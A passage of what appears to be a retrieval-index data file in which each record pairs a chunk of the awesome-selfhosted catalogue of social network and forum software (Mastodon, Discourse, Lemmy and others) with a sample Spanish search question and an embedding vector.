-0.02812, -0.04614, -0.03056, -0.04781, -0.01237, -0.01055, -0.01519, -0.01228, -0.00973, -0.00148, 0.02122, -0.04973, 0.01584]} -{"tipo": "pregunta", "herramienta": "Communication - Social Networks and Forums", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Social Networks and Forums", "tema": "communication - social networks and forums", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Social Networks and Forums: Akkoma β€” Federated microblogging server with Mastodon, GNU social, and ActivityPub compatibility [AGPL-3.0, Elixir/Docker]. Answer β€” Knowledge-based community software. You can use it to quickly build your Q&A community for product technical support, customer support, user communication, and more [Apache-2.0, Docker/Go]. Artalk β€” Comment system built in Golang, providing a lightweight and highly customizable solution for adding comments to your website [MIT, Go/Docker]. AsmBB β€” Fast, SQLite-powered forum engine written in ASM [EUPL-1.2, Assembly]. BuddyPress β€” Powerful plugin that takes your WordPress.org powered site beyond the blog with social-network features like user profiles, activity streams, user groups, and more [GPL-2.0, PHP]. Coral β€” A better commenting experience from Vox Media [Apache-2.0, Docker/Nodejs]. diaspora* β€” Distributed social networking server [AGPL-3.0, Ruby]. Discourse β€” Advanced forum / community solution based on Ruby and JS [GPL-2.0, Docker].", "indexar": "quΓ© programa me sirve para montar un servidor de redes sociales federadas tipo Mastodon?", "v": [-0.0986, -0.07082, -0.16919, -0.15203, -0.17711, -0.03102, -0.08017, -0.11293, -0.05736, -0.13912, -0.10299, -0.02342, 0.02799, -0.1734, 0.1216, 0.0656, 0.17136, -0.10768, 0.17528, -0.04165, 0.02932, -0.04478, 0.05613, -0.16434, -0.02465, -0.00268, 0.05848, -0.09292, -0.12349, 0.02795, 0.10326, -0.00056, -0.01849, 0.01406, 0.00447, -0.0241, 0.04836, 0.12129, -0.07691, -0.00146, 0.06493, -0.03186, -0.06419, -0.03012, 0.02555, 0.00183, -0.02519, -0.12359, 0.0252, 0.08648, 0.01068, -0.08776, -0.05125, 0.02223, -0.11591, -0.04963, 0.0051, -0.16544, -0.10362, 0.04366, -0.0695, -0.02295, -0.01443, -0.00152, 0.08751, -0.07966, -0.01685, 0.02498, -0.02727, -0.03422, -0.01621, -0.0386, -0.00777, -0.04483, -0.0405, 0.11401, 0.00747, 0.02987, 0.03928, 0.07338, -0.00587, 0.03796, -0.04115, 0.15239, -0.06775, 0.01898, 0.06983, -0.06804, -0.01365, -0.04489, 0.02176, 0.11747, -0.06483, 0.00838, -0.00449, -0.07888, 0.07207, -0.01093, 0.01136, 0.01269, -0.02906, 0.03937, -0.04028, 0.05049, -0.03799, 0.02544, 0.02358, -0.05732, 0.06541, -0.01324, 0.15028, 0.02404, -0.08124, 0.02988, -0.09342, -0.03628, -0.04117, 0.03015, 0.13396, 0.00923, -0.0234, 0.0707, 0.03652, -0.00232, 0.05304, 0.02476, 0.07018, 0.13288, -0.01897, 0.04509, -0.02729, 0.01657, -0.06464, -0.01848, -0.03813, -0.06153, -0.00577, -0.05641, -0.06381, -0.10221, 0.00416, 0.00128, -0.04438, -0.06382, 0.0439, 0.04842, 0.13499, -0.16171, -0.01269, 0.06689, 0.07121, 0.01907, -0.07119, -0.01108, -0.08267, 0.00524, -0.00893, -0.03629, 0.02003, 0.06399, -0.04668, 0.00456, 0.02593, -0.06474, 0.03341, 0.06046, -0.03323, 0.03855, 0.08379, 0.06643, -0.04442, 0.09349, 0.02028, -0.05418, 0.06488, 0.02846, -0.08585, -0.05542, 0.00876, 0.06297, -0.10587, 0.01441, 0.06265, 0.03284, -0.04613, -0.04838, -0.04886, 0.02292, 0.00444, -0.00685, 0.02059, -0.03836, -0.03276, 0.06705, 0.12358, -0.08726, -0.00802, 0.00685, 0.05511, -0.05895, -0.02382, -0.03188, -0.00247, 0.03163, 0.00972, 0.01548, 0.00396, -0.03909, 0.03581, 0.09813, -0.00133, -0.05221, 0.065, 0.009, -0.02035, 0.00135, 0.0652, -0.01137, 0.02427, 0.00697, -0.02118, -0.02081, 0.01919, 0.04915, 0.01056, 0.03342, -0.01915, -0.00882, 0.04266, -0.02943, 0.00714, -0.06642, -0.0338, 0.01032, 0.00068, -0.06608, 0.00111, 0.00408, -0.02468, -0.05175, -0.01488, 0.05112, 0.00713, 0.01444, -0.03811, -0.03348, -0.02951, 0.01827, -0.02968, -0.01156, -0.00685, -0.00261, 0.03084, -0.02392, 0.01919, 0.01484]} -{"tipo": "pregunta", "herramienta": "Communication - Social Networks and Forums", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Social Networks and Forums", "tema": "communication - social networks and forums", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Social Networks and Forums: Akkoma β€” Federated microblogging server with Mastodon, GNU social, and ActivityPub compatibility [AGPL-3.0, Elixir/Docker]. Answer β€” Knowledge-based community software. You can use it to quickly build your Q&A community for product technical support, customer support, user communication, and more [Apache-2.0, Docker/Go]. Artalk β€” Comment system built in Golang, providing a lightweight and highly customizable solution for adding comments to your website [MIT, Go/Docker]. AsmBB β€” Fast, SQLite-powered forum engine written in ASM [EUPL-1.2, Assembly]. BuddyPress β€” Powerful plugin that takes your WordPress.org powered site beyond the blog with social-network features like user profiles, activity streams, user groups, and more [GPL-2.0, PHP]. Coral β€” A better commenting experience from Vox Media [Apache-2.0, Docker/Nodejs]. diaspora* β€” Distributed social networking server [AGPL-3.0, Ruby]. Discourse β€” Advanced forum / community solution based on Ruby and JS [GPL-2.0, Docker].", "indexar": "con quΓ© herramienta puedo crear una comunidad de preguntas y respuestas para soporte tΓ©cnico?", "v": [0.00901, 0.16403, -0.12682, -0.17041, 0.04009, -0.13882, -0.03544, -0.03034, 0.00466, -0.05286, -0.1367, 0.05717, 0.01742, -0.04898, 0.04426, -0.00044, 0.12851, -0.07363, 0.07858, 0.05562, 0.04498, -0.10022, -0.15012, -0.05126, 0.00199, -0.05309, 0.06554, -0.08895, -0.10789, 0.0513, 0.06706, 0.04017, -0.08769, 0.07849, -0.07941, -0.01601, 0.05162, 0.09628, -0.0401, 0.07104, -0.15749, -0.10735, 0.06309, 0.00085, 0.07239, 0.02536, 0.02982, -0.06907, 0.03421, 0.07868, -0.08542, -0.16725, -0.03318, -0.0818, -0.05539, -0.11421, 0.28971, -0.20077, 0.0655, -0.10963, -0.15126, -0.04953, 0.02893, -0.01953, 0.01765, -0.03, 0.00134, -0.08552, -0.01346, 0.04813, -0.08671, -0.01662, 0.0043, -0.00883, -0.0421, 0.10588, -0.00672, 0.03259, -0.0273, -0.03597, 0.0581, 0.06962, 0.01152, -0.06599, -0.0964, -0.04984, -0.01061, -0.02545, -0.05048, -0.1264, 0.0059, 0.03537, 0.01008, -0.02983, -0.00635, -0.02255, 0.03284, 0.03151, -0.00214, 0.02776, 0.00678, -0.12958, -0.05832, 0.0576, -0.0239, 0.01076, 0.0723, -0.10892, -0.07727, 0.02507, 0.07934, 0.03025, -0.06294, -0.0617, 0.00376, 0.03471, -0.02657, 0.00343, 0.00834, 0.06953, 0.06991, 0.06893, 0.03857, -0.06727, 0.0783, -0.04682, 0.04335, 0.01917, -0.00875, -0.01821, -0.03338, -0.0408, -0.08285, 0.02144, 0.02917, 0.06024, 0.07466, -0.05443, -0.03599, -0.06705, 0.06024, 0.03917, -0.02117, -0.12719, -0.00932, 0.00803, -0.01936, -0.10958, -0.03182, -0.01648, 0.07136, -0.02383, 0.04713, 0.05834, -0.09298, -0.01415, 0.04773, -0.01549, -0.01053, 0.06222, -0.00843, -0.01141, 0.01393, -0.03296, -0.04032, -0.06765, -0.01768, -0.04606, 0.08072, 0.04242, -0.02677, 0.02772, 0.07427, -0.05362, 0.03376, -0.07036, -0.0501, -0.07425, -0.01622, -0.10767, -0.05043, 0.00357, -0.03798, 0.00161, 0.02644, -0.06709, 0.04414, -0.01616, 0.04185, 0.04142, -0.00783, 0.00537, -0.01375, -0.05436, 0.00299, -0.01101, 0.02549, -0.03721, -0.01144, -0.02964, -0.06197, 0.05041, -0.02443, -0.01566, -0.03266, 0.06758, -0.05833, 0.01985, 0.00771, -0.00251, 0.03097, 0.01152, 0.08613, 0.00201, -0.05534, -0.05954, -0.00384, 0.02246, -0.02938, 0.00549, 0.06728, 0.05966, 0.08532, -0.01758, 0.05374, 0.02493, 0.05011, 0.01312, -0.0006, 0.01068, 0.05748, -0.03657, -0.01983, -0.02803, 0.03116, 0.00487, 0.04855, -0.0196, -0.03337, 0.00766, 0.03741, 0.05938, -0.03257, -0.01818, -0.06641, -0.02761, -0.00834, 0.02919, -0.04176, -0.09747, -0.01501, 0.02265, 0.05956, -0.04577, 0.05646, -0.017]} -{"tipo": "pregunta", "herramienta": "Communication - Social Networks and Forums", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Social Networks and Forums", "tema": "communication - social networks and forums", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Social Networks and Forums: Akkoma β€” Federated microblogging server with Mastodon, GNU social, and ActivityPub compatibility [AGPL-3.0, Elixir/Docker]. Answer β€” Knowledge-based community software. You can use it to quickly build your Q&A community for product technical support, customer support, user communication, and more [Apache-2.0, Docker/Go]. Artalk β€” Comment system built in Golang, providing a lightweight and highly customizable solution for adding comments to your website [MIT, Go/Docker]. AsmBB β€” Fast, SQLite-powered forum engine written in ASM [EUPL-1.2, Assembly]. BuddyPress β€” Powerful plugin that takes your WordPress.org powered site beyond the blog with social-network features like user profiles, activity streams, user groups, and more [GPL-2.0, PHP]. Coral β€” A better commenting experience from Vox Media [Apache-2.0, Docker/Nodejs]. diaspora* β€” Distributed social networking server [AGPL-3.0, Ruby]. Discourse β€” Advanced forum / community solution based on Ruby and JS [GPL-2.0, Docker].", "indexar": "cual es una alternativa libre a WordPress con funciones de red social avanzada?", "v": [0.06574, 0.04972, -0.11856, -0.06652, -0.03395, 0.06118, -0.00354, -0.18541, -0.04214, -0.09081, -0.1397, -0.18438, -0.04046, -0.01755, 0.14085, -0.08156, 0.04795, -0.0825, 0.07153, 0.02521, -0.09396, -0.06357, -0.07656, -0.1017, 0.05808, -0.01287, 0.02604, -0.02186, -0.07276, 0.00654, 0.07153, -0.01057, -0.01773, 0.02173, -0.05332, 0.15354, 0.00472, 0.12063, 0.08388, -0.04243, -0.01346, -0.02967, -0.03776, 0.11671, -0.09462, 0.00841, -0.01069, -0.05241, -0.00323, 0.07249, -0.0357, -0.03434, -0.09491, 0.11136, 0.01979, -0.09538, 0.09311, -0.16451, -0.19584, 0.10401, -0.10195, 0.16607, -0.09297, 0.05421, -0.02204, -0.06058, -0.01148, 0.04457, 0.06073, 0.12429, 0.06828, -0.00706, -0.08874, -0.0678, -0.07189, 0.08546, -0.08781, 0.05803, -0.07168, -0.04739, 0.04248, -0.01789, -0.06788, 0.01895, -0.07387, -0.10781, 0.07573, -0.12492, -0.04179, 0.12841, 0.15069, 0.0365, -0.01737, 0.08304, -0.0685, -0.03366, -0.03231, -0.07105, -0.00035, -0.02426, 0.03025, -0.03276, -0.05265, 0.03225, 0.06762, -0.02408, 0.02537, -0.00679, 0.00304, -0.11369, 0.03543, 0.0081, 0.01519, -0.01355, -0.02937, -0.00173, -0.03358, 0.04418, 0.03978, 0.00929, -0.02959, 0.04646, -0.01839, -0.10885, 0.12773, 0.06516, 0.00952, 0.11318, 0.01106, 0.04049, 0.0413, 0.01368, -0.0923, -0.0189, -0.10414, 0.0619, 0.06164, 0.00675, -0.0103, -0.03904, 0.05192, 0.00392, 0.06559, -0.11865, 0.03777, 0.01701, 0.03161, -0.05989, 0.02184, 0.03127, -0.04385, 0.02683, -0.00534, 0.11863, -0.02842, 0.01094, -0.01662, -0.00049, -0.03932, 0.05873, -0.01585, -0.07715, -0.00965, 0.01907, -0.02333, -0.03595, -1e-05, -0.00516, 0.03047, -0.05986, 0.00206, 0.02751, 0.02261, -0.06303, 0.02308, -0.05008, -0.01211, -0.10289, 0.08961, -0.03227, -0.03406, 0.03123, -0.07329, -0.04057, 0.02373, -0.08247, -0.11205, -0.0025, -0.03644, 0.03169, -0.05481, -0.04913, 0.01043, -0.02921, 0.02071, 0.00296, -0.05195, -0.0683, 0.0342, -0.06167, -0.04168, -0.02595, -0.02913, 0.05092, -0.0181, 0.00113, 0.03912, 0.05094, 0.00411, 0.04627, -0.02349, -0.0151, 0.02418, 0.05364, -0.05262, -0.06328, 0.03554, -0.08464, 0.02839, -0.0021, 0.0305, 0.0519, 0.04053, 0.03913, 0.01073, 0.02127, 0.01735, 0.02796, 0.02667, 0.01128, 0.0027, -5e-05, -0.01509, 0.01914, 0.05232, -0.0577, 0.04292, 0.0257, -0.02188, -0.02639, 0.07633, 0.0765, 0.01499, 0.03189, -0.02212, -0.04368, -0.10543, 0.02666, 0.02407, -0.05441, -0.00439, 0.07803, -0.00417, -0.06098, -0.00301, 0.04368]} -{"tipo": "pregunta", "herramienta": "Communication - Social Networks and Forums", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Social Networks and Forums", "tema": "communication - social networks and forums", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Social Networks and Forums: Elgg β€” Powerful open source social networking engine [GPL-2.0, PHP]. Enigma 1/2 BBS β€” Enigma 1/2 is a modern, multi-platform BBS engine with unlimited \"callers\" and legacy DOS door game support [BSD-2-Clause, Shell/Docker/Nodejs]. Flarum β€” Delightfully simple forums. Flarum is the next-generation forum software that makes online discussion fun again [MIT, PHP]. Friendica β€” Social Communication Server [AGPL-3.0, PHP]. GoToSocial β€” ActivityPub federated social network server implementing the Mastodon client API [AGPL-3.0, Docker/Go]. Habitat β€” A Platform for Local Communities [AGPL-3.0, Docker]. Hatsu β€” Bridge that interacts with Fediverse on behalf of your static site [AGPL-3.0, Docker/Rust]. Hubzilla β€” Decentralized identity, privacy, publishing, sharing, cloud storage, and communications/social platform [MIT, PHP]. HumHub β€” Flexible kit for private social networks [AGPL-3.0, PHP]. Iceshrimp.NET β€” Federated microblogging server that communicates over ActivityPub [EUPL-1.2, .NET/C#/Docker].", "indexar": "que alternativa libre de Mastodon me sirve para crear un foro social?", "v": [-0.00705, 0.05778, -0.13727, 0.00423, -0.18312, -0.08868, -0.16586, -0.12101, -0.06547, -0.07778, -0.08483, -0.14672, 0.10572, -0.06864, 0.06139, -0.04466, 0.16038, -0.10009, 0.07839, -0.00286, -0.01036, 0.01415, -0.01849, -0.17852, 0.02017, -0.16378, 0.0063, -0.1149, -0.0821, 0.11778, 0.10599, -0.00475, -0.00902, 0.02792, -0.00439, -0.02909, 0.17813, 0.01872, 0.06553, 0.00624, 0.00355, 0.03764, -0.03995, 0.09124, -0.06713, -0.00445, -0.05631, -0.00166, -0.03853, 0.2144, 0.01744, -0.12712, -0.03624, 0.08652, 0.04801, -0.09966, 0.03043, -0.1623, -0.11591, -0.00225, -0.15945, -0.02618, 0.04069, -0.01804, 0.04403, -0.01629, -0.02533, 0.03432, -0.00287, 0.09477, -0.08528, -0.08478, -0.00212, -0.04596, -0.0097, 0.02902, 0.01746, 0.04593, -0.09396, 0.05098, 0.0025, -0.04105, -0.03255, -0.02037, -0.01983, -0.00685, 0.07155, -0.07513, -0.0443, -0.00169, 0.03804, 0.00489, -0.00107, 0.02951, -0.02553, -0.03157, -0.06421, 0.07453, -0.0193, 0.02607, -0.01795, -0.00646, -0.08439, -0.0621, -0.02006, -0.09364, -0.02798, -0.04321, -0.00768, 0.03791, 0.08296, 0.03108, 0.01474, -0.05369, -0.02186, 0.07197, -0.07618, 0.09684, 0.06474, 0.05184, 0.06263, 0.02598, -0.06498, -0.09683, -0.03199, 0.06117, 0.09815, 0.06129, -0.02201, 0.11144, -0.01184, -0.03401, -0.07106, -0.04923, -0.05789, 0.00072, 0.05133, -0.00187, -0.02149, -0.02719, 0.01862, 0.066, -0.08812, -0.12576, -0.04467, -0.04774, 0.01533, -0.09143, 0.04546, 0.00879, -0.00636, -0.02453, -0.01071, 0.0628, -0.07318, 0.00626, -0.01436, -0.01002, 0.00905, 0.07352, -0.0146, -0.02027, 0.03831, -0.04531, -0.02374, 0.00323, -0.0159, -0.04923, 0.00942, -0.013, 0.01146, 0.06985, 0.13, -0.06999, 0.14944, -0.01374, -0.02552, -0.11493, -0.03599, 0.01534, -0.02592, -0.01564, -0.078, 0.02181, 0.0036, -0.0749, -0.02243, -0.00194, 0.02115, 0.0182, -0.054, -0.03256, -0.00468, -0.01417, 0.00797, -0.02036, 0.07834, -0.10846, 0.02521, -0.10239, -0.04696, 0.03247, -0.01814, 0.02435, -0.04659, -0.00038, 0.03971, -0.01012, 0.05481, 0.03591, 0.03512, -0.03552, 0.0915, 0.04024, -0.02251, 0.00858, 0.08358, -0.07415, 0.05539, -0.06235, -0.01835, 0.01229, -0.01695, 0.05223, 0.0011, 0.10685, -0.02468, -0.009, -0.03359, 0.01646, 0.04509, -0.01235, -0.01549, -0.00652, 0.0113, -0.05024, -0.01284, 0.06549, 0.01012, -0.00138, 0.01726, -0.00531, 0.00992, -0.01429, -0.079, 0.01205, -0.02623, 0.00446, -0.05099, -0.04737, -0.002, 0.02336, 0.03859, 0.02812, 0.01485, 0.07115]} -{"tipo": "pregunta", "herramienta": "Communication - Social Networks and Forums", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Social Networks and Forums", "tema": "communication - social networks and forums", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Social Networks and Forums: Elgg β€” Powerful open source social networking engine [GPL-2.0, PHP]. Enigma 1/2 BBS β€” Enigma 1/2 is a modern, multi-platform BBS engine with unlimited \"callers\" and legacy DOS door game support [BSD-2-Clause, Shell/Docker/Nodejs]. Flarum β€” Delightfully simple forums. Flarum is the next-generation forum software that makes online discussion fun again [MIT, PHP]. Friendica β€” Social Communication Server [AGPL-3.0, PHP]. GoToSocial β€” ActivityPub federated social network server implementing the Mastodon client API [AGPL-3.0, Docker/Go]. Habitat β€” A Platform for Local Communities [AGPL-3.0, Docker]. Hatsu β€” Bridge that interacts with Fediverse on behalf of your static site [AGPL-3.0, Docker/Rust]. Hubzilla β€” Decentralized identity, privacy, publishing, sharing, cloud storage, and communications/social platform [MIT, PHP]. HumHub β€” Flexible kit for private social networks [AGPL-3.0, PHP]. Iceshrimp.NET β€” Federated microblogging server that communicates over ActivityPub [EUPL-1.2, .NET/C#/Docker].", "indexar": "con quΓ© programa puedo montar un servidor de mensajerΓ­a federada local?", "v": [-0.00861, -0.00521, -0.11928, -0.16663, -0.14925, -0.0489, 0.04741, -0.05546, -0.09046, -0.17595, -0.08736, 0.04697, 0.05672, -0.13328, 0.03387, 0.1523, 0.20461, -0.05711, 0.15614, -0.00782, 0.08153, 0.01703, 0.04429, -0.08464, -0.02494, 0.03881, 0.09959, -0.06438, -0.02605, -0.0317, 0.15164, -0.01355, 0.08645, 0.03164, 0.05699, 0.03632, 0.08473, 0.07562, -0.04949, -0.02718, 0.09283, 0.00997, -0.0371, -0.02167, -0.0004, -0.03358, 0.03289, -0.10302, 0.06623, 0.02429, 0.01056, -0.08092, -0.02687, -0.02376, -0.05033, 0.03548, 0.06288, -0.16675, 0.00957, -0.00187, -0.06742, 0.02998, -0.04475, -0.01325, 0.06997, -0.02411, 0.05051, -0.06174, -0.10679, -0.06443, 0.00818, -0.104, -0.02042, -0.02133, -0.0921, 0.14189, -0.07451, 0.05727, 0.04525, 0.09663, 0.03, -0.02048, 0.02539, 0.1294, -0.04853, -0.06614, -0.01633, -0.06678, 0.04834, -0.02792, 0.0298, 0.06671, -0.06299, 0.07045, 0.03533, -0.14084, 0.06115, -0.02249, -0.03456, 0.10355, 0.02507, 0.02538, -0.05011, 0.13447, 0.0145, 0.01122, 0.08505, -0.01206, 0.10976, 0.05838, 0.13823, -0.02025, -0.01112, 0.04998, -0.10157, -0.13622, 0.03202, 0.02828, 0.13511, 0.02149, -0.09122, 0.09577, 0.0684, 0.05243, 0.04424, 0.02143, 0.05861, 0.10488, -0.06171, 0.05785, 0.00851, -0.03378, -0.01655, -0.04479, -0.03462, -0.0096, 0.01707, -0.035, -0.00776, 0.03853, -0.02952, 0.00154, -0.01124, -0.00406, 0.06465, 0.06862, 0.03204, -0.16376, -0.03749, 0.06308, 0.11797, -0.01122, -0.07575, -0.00553, -0.08155, 0.00017, 0.09342, -0.01027, 0.00823, 0.07728, -0.00312, 0.04546, -0.02652, 0.00988, 0.04623, -0.02882, -0.00034, 0.11825, 0.05181, 0.08577, -0.0711, 0.06768, 0.04744, -0.03827, 0.01056, 0.04408, -0.04678, -0.057, -0.0259, -0.01323, -0.03028, 0.07189, 0.07875, 0.03156, -0.01686, 0.01648, -0.04121, 0.01656, 0.03456, 0.01351, 0.03616, -0.00543, -0.08863, 0.04928, 0.05401, -0.06623, -0.04551, -0.00481, -0.00907, -0.01454, -0.03251, -0.05368, -0.00108, 0.03288, -0.02923, 0.02343, -0.06206, 0.01134, 0.02237, 0.08401, 0.01018, -0.04636, 0.06384, -0.00699, -0.00151, 0.02368, 0.05294, -0.02298, -0.00525, 0.02751, -0.01813, -0.01664, 0.03184, -0.00568, -0.02957, 0.00185, 0.00589, 0.05101, 0.09987, 0.03341, -0.02549, -0.00354, -0.05943, 0.02123, 0.032, -0.04025, 0.01026, -0.03493, -0.01323, -0.07089, -0.03022, 0.08797, -0.01378, 0.00597, -0.01002, -0.02731, -0.02179, -0.01129, -0.06573, 0.02388, -0.02154, -0.02289, 0.01563, -0.04288, 0.01301, -0.0033]} -{"tipo": "pregunta", "herramienta": "Communication - Social Networks and Forums", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Social Networks and Forums", "tema": "communication - social networks and forums", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Social Networks and Forums: Elgg β€” Powerful open source social networking engine [GPL-2.0, PHP]. Enigma 1/2 BBS β€” Enigma 1/2 is a modern, multi-platform BBS engine with unlimited \"callers\" and legacy DOS door game support [BSD-2-Clause, Shell/Docker/Nodejs]. Flarum β€” Delightfully simple forums. Flarum is the next-generation forum software that makes online discussion fun again [MIT, PHP]. Friendica β€” Social Communication Server [AGPL-3.0, PHP]. GoToSocial β€” ActivityPub federated social network server implementing the Mastodon client API [AGPL-3.0, Docker/Go]. Habitat β€” A Platform for Local Communities [AGPL-3.0, Docker]. Hatsu β€” Bridge that interacts with Fediverse on behalf of your static site [AGPL-3.0, Docker/Rust]. Hubzilla β€” Decentralized identity, privacy, publishing, sharing, cloud storage, and communications/social platform [MIT, PHP]. HumHub β€” Flexible kit for private social networks [AGPL-3.0, PHP]. Iceshrimp.NET β€” Federated microblogging server that communicates over ActivityPub [EUPL-1.2, .NET/C#/Docker].", "indexar": "quΓ© herramienta puedo usar si quiero construir una plataforma de comunidades descentralizadas?", "v": [-0.11874, 0.11121, -0.21746, -0.128, -0.00597, -0.1448, -0.00195, 0.00286, -0.11695, -0.15559, -0.16827, -0.03626, -0.06379, 0.03021, 0.03539, 0.05366, 0.09531, -0.01763, -0.02022, -0.03146, -0.02761, -0.07793, -0.06316, -0.02258, -0.04976, -0.06535, 0.06787, -0.13716, -0.12998, 0.02027, 0.03178, 0.07148, 0.02101, 0.04818, -0.04954, -0.1662, -0.01653, 0.05294, -0.06577, -0.04757, -0.04402, 0.05946, -0.10082, -0.02764, 0.01588, 0.08976, -0.04876, -0.0991, -0.01605, 0.00231, -0.12138, -0.09799, -0.19517, -0.01612, 0.06664, -0.05414, 0.20817, -0.13473, 0.05293, -0.02993, -0.18219, 0.00825, 0.0471, -0.02563, -0.04307, -0.05247, -0.07612, 0.03165, -0.06523, 0.15173, 0.03631, 0.00842, 0.0668, -0.06798, 0.00887, 0.01011, 0.00249, -0.09123, -0.01164, -0.04895, 0.05314, 0.02393, -0.0532, -0.01811, -0.03472, -0.06511, 0.01829, -0.07893, 0.07887, -0.08817, -0.00765, 0.02298, 0.00842, -0.0418, 0.02661, -0.06609, 0.04886, -0.01128, 0.00496, 0.00315, 0.05451, -0.07393, -0.00165, 0.03588, 0.02266, -0.03239, 0.02793, -0.07002, -0.00844, -0.03705, 0.08334, 0.04562, 0.05801, -0.03736, 0.0014, 0.06583, -0.07269, -0.00813, 0.01162, -0.0478, 0.0439, 0.04422, 0.01091, -0.1177, 0.11277, -0.0016, 0.00056, 0.05238, 0.00172, 0.01959, -0.02863, -0.02681, -0.07203, -0.03115, -0.04853, -0.01476, 0.04365, -0.10092, 0.00061, -0.06498, 0.05669, 0.03744, -0.03597, -0.15035, 0.0564, -0.00855, -0.00341, -0.09564, -0.00381, 0.01455, 0.01343, -0.00587, -0.00951, -0.0119, -0.06416, -0.07501, 0.05299, -0.0439, -0.1019, 0.08912, -0.02411, -0.02545, -0.00132, 0.02627, 0.02264, -0.05575, 0.02396, 0.01614, 0.06864, 0.02969, 0.09545, 0.05078, 0.12464, -0.07235, 0.09998, -0.07123, -0.08298, -0.01669, -0.02122, -0.05763, -0.08122, -0.00373, -0.0838, -0.0003, 0.08482, 0.04144, -0.035, -0.02128, 0.04166, 0.08597, 0.00177, 0.02204, 0.02743, 0.0067, 0.0795, -0.0518, -0.0129, -0.01993, -0.00224, -0.05926, -0.06433, 0.00729, -0.00566, -0.04458, -0.02168, 0.04953, -0.05424, -0.02312, -0.02002, 0.07183, 0.05465, -0.01729, 0.05759, -0.01727, 0.00316, -0.01476, 0.01377, -0.01522, -0.01883, -0.00583, -0.00478, 0.06315, 0.03241, 0.00376, 0.03137, 0.02759, 0.04857, 0.01532, 0.00104, 0.00169, 0.03363, -0.0101, -0.02145, -0.00132, 0.03279, -0.03219, 0.02783, 0.00489, -0.06187, 0.00937, -0.01075, 0.09587, -0.01354, -0.00691, -0.01117, -0.02238, -0.03421, -0.00905, -0.03016, -0.10878, -0.05402, 0.02298, 0.1043, -0.05064, 0.01951, 0.0054]} -{"tipo": "pregunta", "herramienta": "Communication - Social Networks and Forums", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Social Networks and Forums", "tema": "communication - social networks and forums", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Social Networks and Forums: Isso β€” Lightweight commenting server written in Python and Javascript. It aims to be a drop-in replacement for Disqus [MIT, Python/Docker]. Lemmy β€” Link aggregator for the fediverse (alternative to Reddit) [AGPL-3.0, Docker/Rust]. Loomio β€” Collaborative decision-making tool that makes it easy for anyone to participate in decisions which affect them [AGPL-3.0, Docker]. Mastodon β€” Federated microblogging server [AGPL-3.0, Ruby]. Misago β€” Fully featured modern forum application that is fast, scalable and responsive [GPL-2.0, Docker]. Misskey β€” Decentralized app-like microblogging server/SNS for the Fediverse, using the ActivityPub protocol like GNU social and Mastodon [AGPL-3.0, Nodejs/Docker]. Movim β€” Modern, federated social network based on XMPP, with a fully featured group-chat, subscriptions and microblogging [AGPL-3.0, PHP/Docker]. MyBB β€” Free, extensible forum software package [LGPL-3.0, PHP]. NodeBB β€” Forum software built for the modern web [GPL-3.0, Nodejs/Docker].", "indexar": "que programa hay para tener un foro o comunidad propia como alternativa a Reddit?", "v": [-0.05668, 0.09778, -0.06581, -0.09305, 0.04214, -0.0514, -0.02141, -0.06923, -0.04196, -0.11443, -0.08913, -0.09174, 0.03442, -0.08479, 0.0773, -0.02784, 0.05326, -0.01609, 0.16995, -0.07491, -0.01953, 0.03765, -0.00013, -0.03745, 0.04353, -0.13837, 0.10965, -0.04764, 0.04417, 0.03711, 0.08509, 0.0001, 0.00605, -0.02145, -0.16428, -0.03121, 0.21331, 0.06151, 0.0312, 0.02592, -0.10856, 0.07008, -0.01793, 0.05988, 0.01614, 0.07023, -0.13121, -0.0154, -0.07044, -0.03062, -0.0238, -0.04401, -0.02806, 0.0527, 0.16214, -0.09577, 0.05994, -0.18681, -0.02704, 0.02912, -0.14684, 0.03361, 0.03979, -0.01886, -0.11939, 0.00668, 0.00438, 0.01822, -0.01579, 0.10406, -0.09307, -0.02925, -0.01074, -0.15091, -0.04268, -0.00657, 0.0206, -0.06167, -0.0408, -0.0557, 0.0111, -0.08327, 0.16422, 0.09324, -0.13219, -0.15851, 0.01371, -0.08065, -0.00666, 0.02638, -0.02397, -0.00389, 0.01957, 0.00495, 0.04049, -0.11142, 0.1315, 0.1061, 0.05067, 0.00114, 0.0092, -0.04705, -0.04822, -0.01713, -0.0419, 0.03528, 0.06659, -0.03774, -0.02847, 0.07547, 0.11832, -0.01586, 0.0569, 0.00106, -0.05257, 0.03072, -0.10915, -0.0025, 0.0741, 0.01233, -0.06299, 0.01687, -0.00858, -0.02917, 0.05874, 0.05429, -0.05572, 0.00245, -0.01427, 0.05442, -0.0266, -0.0611, -0.00175, -0.06628, -0.19917, -0.0024, 0.02468, 0.00498, -0.02741, -0.07117, 0.09541, 0.04134, -0.02528, -0.1596, -0.03887, -0.09548, -0.01187, -0.11733, 0.00658, 0.02341, -0.04173, -0.01549, 0.00926, 0.03568, -0.06166, -0.00913, 0.0229, -0.04551, -0.01342, 0.04127, -0.02333, -0.12794, 0.0582, -0.10855, 0.00911, 0.01188, -0.00299, -0.00584, 0.02049, -0.00866, 0.03337, 0.07258, 0.07988, -0.0342, 0.06819, -0.05232, 0.00881, -0.10139, -0.00163, -0.00591, -0.05996, 0.02841, -0.05768, 0.02249, 0.03999, -0.02338, 0.00322, 0.03158, 0.03746, 0.05508, 0.02081, -0.02906, 0.00283, 0.01321, -0.03954, 